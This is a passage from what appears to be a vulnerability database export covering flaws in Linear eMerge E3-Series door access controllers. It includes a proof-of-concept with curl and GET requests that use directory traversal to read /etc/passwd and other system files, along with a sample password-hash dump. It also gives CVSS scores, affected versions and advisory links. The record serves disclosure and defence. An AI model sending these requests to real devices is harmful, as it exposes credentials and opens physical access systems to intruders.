"data": "Linear eMerge E3-Series devices allow File Inclusion. Linear eMerge E3 Series devices contain vulnerabilities related to authorization, privileges, and access control.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. A security vulnerability exists in Nortek Security \u0026 Control Linear eMerge E3-Series. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements. \nLinear eMerge E3 Unauthenticated Directory Traversal File Disclosure\nAffected version: \u003c=1.00-06\nCVE: CVE-2019-7254\nAdvisory: https://applied-risk.com/resources/ar-2019-005\n\nby Gjoko \u0027LiquidWorm\u0027 Krstic\n\n\nGET /?c=../../../../../../etc/passwd%00\nHost: 192.168.1.2\n\nroot:$1$VVtYRWvv$gyIQsOnvSv53KQwzEfZpJ0:0:100:root:/root:/bin/sh\nbin:x:1:1:bin:/bin:\ndaemon:x:2:2:daemon:/sbin:\nadm:x:3:4:adm:/var/adm:\nlp:x:4:7:lp:/var/spool/lpd:\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/spool/mail:\nnews:x:9:13:news:/var/spool/news:\nuucp:x:10:14:uucp:/var/spool/uucp:\noperator:x:11:0:operator:/root:\ngames:x:12:100:games:/usr/games:\ngopher:x:13:30:gopher:/usr/lib/gopher-data:\nftp:x:14:50:FTP User:/home/ftp:\nnobody:x:99:99:Nobody:/home/default:\ne3user:$1$vR6H2PUd$52r03jiYrM6m5Bff03yT0/:1000:1000:Linux User,,,:/home/e3user:/bin/sh\nlighttpd:$1$vqbixaUx$id5O6Pnoi5/fXQzE484CP1:1001:1000:Linux User,,,:/home/lighttpd:/bin/sh\n\n\ncurl -s http://192.168.1.3/badging/badge_print_v0.php?tpl=../../../../../etc/passwd\ncurl -s http://192.168.1.2/badging/badge_template_print.php?tpl=../../../../../etc/version\ncurl -s http://192.168.1.2/badging/badge_template_v0.php?layout=../../../../../../../etc/issue\ncurl -s http://192.168.1.2/?c=../../../../../../etc/passwd%00\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7254"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006012"
},
{
"db": "VULHUB",
"id": "VHN-158689"
},
{
"db": "VULMON",
"id": "CVE-2019-7254"
},
{
"db": "PACKETSTORM",
"id": "155252"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-7254",
"trust": 3.5
},
{
"db": "PACKETSTORM",
"id": "155252",
"trust": 1.9
},
{
"db": "ICS CERT",
"id": "ICSA-24-065-01",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU96911165",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006012",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201907-114",
"trust": 0.7
},
{
"db": "EXPLOIT-DB",
"id": "47618",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-158689",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2019-7254",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158689"
},
{
"db": "VULMON",
"id": "CVE-2019-7254"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006012"
},
{
"db": "PACKETSTORM",
"id": "155252"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-114"
},
{
"db": "NVD",
"id": "CVE-2019-7254"
}
]
},
"id": "VAR-201907-0155",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-158689"
}
],
"trust": 0.01
},
"last_update_date": "2024-03-18T22:23:59.333000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top\u00a0Page",
"trust": 0.8,
"url": "https://www.nortekcontrol.com/"
},
{
"title": "Kenzer Templates [5170] [DEPRECATED]",
"trust": 0.1,
"url": "https://github.com/arpsyndicate/kenzer-templates "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2019-7254"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006012"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.1
},
{
"problemtype": "Authorization / authority / access control (CWE-264) [NVD evaluation ]",
"trust": 0.8
},
{
"problemtype": "CWE-264",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158689"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006012"
},
{
"db": "NVD",
"id": "CVE-2019-7254"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://www.applied-risk.com/resources/ar-2019-005"
},
{
"trust": 1.9,
"url": "http://packetstormsecurity.com/files/155252/linear-emerge-e3-1.00-06-directory-traversal.html"
},
{
"trust": 1.8,
"url": "https://applied-risk.com/labs/advisories"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7254"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu96911165/"
},
{
"trust": 0.8,
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-065-01"
},
{
"trust": 0.6,
"url": "https://www.exploit-db.com/exploits/47618"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/22.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/arpsyndicate/kenzer-templates"
},
{
"trust": 0.1,
"url": "http://192.168.1.3/badging/badge_print_v0.php?tpl=../../../../../etc/passwd"
},
{
"trust": 0.1,
"url": "http://192.168.1.2/?c=../../../../../../etc/passwd%00"
},
{
"trust": 0.1,
"url": "https://applied-risk.com/resources/ar-2019-005"
},
{
"trust": 0.1,
"url": "http://192.168.1.2/badging/badge_template_print.php?tpl=../../../../../etc/version"
},
{
"trust": 0.1,
"url": "http://192.168.1.2/badging/badge_template_v0.php?layout=../../../../../../../etc/issue"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158689"
},
{
"db": "VULMON",
"id": "CVE-2019-7254"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006012"
},
{
"db": "PACKETSTORM",
"id": "155252"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-114"
},
{
"db": "NVD",
"id": "CVE-2019-7254"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-158689"
},
{
"db": "VULMON",
"id": "CVE-2019-7254"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006012"
},
{
"db": "PACKETSTORM",
"id": "155252"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-114"
},
{
"db": "NVD",
"id": "CVE-2019-7254"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-07-02T00:00:00",
"db": "VULHUB",
"id": "VHN-158689"
},
{
"date": "2019-07-02T00:00:00",
"db": "VULMON",
"id": "CVE-2019-7254"
},
{
"date": "2019-07-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-006012"
},
{
"date": "2019-11-12T17:07:24",
"db": "PACKETSTORM",
"id": "155252"
},
{
"date": "2019-07-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-114"
},
{
"date": "2019-07-02T19:15:11.007000",
"db": "NVD",
"id": "CVE-2019-7254"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-08-24T00:00:00",
"db": "VULHUB",
"id": "VHN-158689"
},
{
"date": "2021-10-04T00:00:00",
"db": "VULMON",
"id": "CVE-2019-7254"
},
{
"date": "2024-03-07T07:18:00",
"db": "JVNDB",
"id": "JVNDB-2019-006012"
},
{
"date": "2021-10-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-114"
},
{
"date": "2021-10-04T17:15:57.257000",
"db": "NVD",
"id": "CVE-2019-7254"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-114"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linear\u00a0eMerge\u00a0E3\u00a0 Vulnerabilities related to authorization, privileges, and access control in series devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-006012"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "path traversal",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-114"
}
],
"trust": 0.6
}
}
VAR-201907-0160
Vulnerability from variot - Updated: 2024-03-18 22:23Linear eMerge E3-Series devices allow Authorization Bypass with Information Disclosure. (DoS) It may be in a state. Nortek Security & Control Linear eMerge E3-Series is an access control device from Nortek Security & Control, USA. An attacker can use the GET request to exploit the vulnerability to bypass authorization, obtain management credentials, log in again with admin permissions, and gain full access to the control interface
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201907-0160",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linear emerge elite",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "1.00-06"
},
{
"model": "linear emerge essential",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "1.00-06"
},
{
"model": "linear emerge elite",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
},
{
"model": "linear emerge essential",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
},
{
"model": "security\u0026control linear emerge e3-series",
"scope": "lte",
"trust": 0.6,
"vendor": "nortek",
"version": "\u003c=1.00-06"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34627"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006011"
},
{
"db": "NVD",
"id": "CVE-2019-7259"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.00-06",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_essential:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_elite_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.00-06",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_elite:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7259"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "LiquidWorm",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-104"
}
],
"trust": 0.6
},
"cve": "CVE-2019-7259",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2019-7259",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CNVD-2019-34627",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "VHN-158694",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-7259",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-7259",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2019-34627",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201907-104",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-158694",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34627"
},
{
"db": "VULHUB",
"id": "VHN-158694"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006011"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-104"
},
{
"db": "NVD",
"id": "CVE-2019-7259"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linear eMerge E3-Series devices allow Authorization Bypass with Information Disclosure. (DoS) It may be in a state. Nortek Security \u0026 Control Linear eMerge E3-Series is an access control device from Nortek Security \u0026 Control, USA. An attacker can use the GET request to exploit the vulnerability to bypass authorization, obtain management credentials, log in again with admin permissions, and gain full access to the control interface",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7259"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006011"
},
{
"db": "CNVD",
"id": "CNVD-2019-34627"
},
{
"db": "VULHUB",
"id": "VHN-158694"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-7259",
"trust": 3.9
},
{
"db": "PACKETSTORM",
"id": "155260",
"trust": 1.7
},
{
"db": "ICS CERT",
"id": "ICSA-24-065-01",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU96911165",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006011",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201907-104",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2019-34627",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-158694",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34627"
},
{
"db": "VULHUB",
"id": "VHN-158694"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006011"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-104"
},
{
"db": "NVD",
"id": "CVE-2019-7259"
}
]
},
"id": "VAR-201907-0160",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34627"
},
{
"db": "VULHUB",
"id": "VHN-158694"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34627"
}
]
},
"last_update_date": "2024-03-18T22:23:59.305000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top\u00a0Page",
"trust": 0.8,
"url": "https://www.nortekcontrol.com/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-006011"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-200",
"trust": 1.1
},
{
"problemtype": "Inappropriate authorization (CWE-285) [NVD evaluation ]",
"trust": 0.8
},
{
"problemtype": "CWE-285",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158694"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006011"
},
{
"db": "NVD",
"id": "CVE-2019-7259"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.applied-risk.com/resources/ar-2019-005"
},
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7259"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/155260/linear-emerge-e3-1.00-06-privilege-escalation.html"
},
{
"trust": 1.7,
"url": "https://applied-risk.com/labs/advisories"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu96911165/"
},
{
"trust": 0.8,
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-065-01"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34627"
},
{
"db": "VULHUB",
"id": "VHN-158694"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006011"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-104"
},
{
"db": "NVD",
"id": "CVE-2019-7259"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-34627"
},
{
"db": "VULHUB",
"id": "VHN-158694"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006011"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-104"
},
{
"db": "NVD",
"id": "CVE-2019-7259"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-34627"
},
{
"date": "2019-07-02T00:00:00",
"db": "VULHUB",
"id": "VHN-158694"
},
{
"date": "2019-07-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-006011"
},
{
"date": "2019-07-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-104"
},
{
"date": "2019-07-02T18:15:11.940000",
"db": "NVD",
"id": "CVE-2019-7259"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-34627"
},
{
"date": "2020-08-24T00:00:00",
"db": "VULHUB",
"id": "VHN-158694"
},
{
"date": "2024-03-07T08:17:00",
"db": "JVNDB",
"id": "JVNDB-2019-006011"
},
{
"date": "2022-10-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-104"
},
{
"date": "2022-10-14T01:13:17.953000",
"db": "NVD",
"id": "CVE-2019-7259"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-104"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linear\u00a0eMerge\u00a0E3\u00a0 Authorization vulnerabilities in series devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-006011"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-104"
}
],
"trust": 0.6
}
}
VAR-201907-0159
Vulnerability from variot - Updated: 2024-03-18 22:23Linear eMerge E3-Series devices allow Privilege Escalation. Linear eMerge E3 Series devices contain vulnerabilities related to authorization, privileges, and access control.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Nortek Security & Control Linear eMerge E3-Series is an access control device from Nortek Security & Control, USA.
Nortek Security & Control Linear eMerge E3-Series has a permission permission and access control problem vulnerability. An attacker could use this vulnerability to elevate to superuser privileges
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201907-0159",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linear emerge elite",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "1.00-06"
},
{
"model": "linear emerge essential",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "1.00-06"
},
{
"model": "linear emerge elite",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
},
{
"model": "linear emerge essential",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
},
{
"model": "security\u0026control linear emerge e3-series",
"scope": "lte",
"trust": 0.6,
"vendor": "nortek",
"version": "\u003c=1.00-06"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34628"
},
{
"db": "JVNDB",
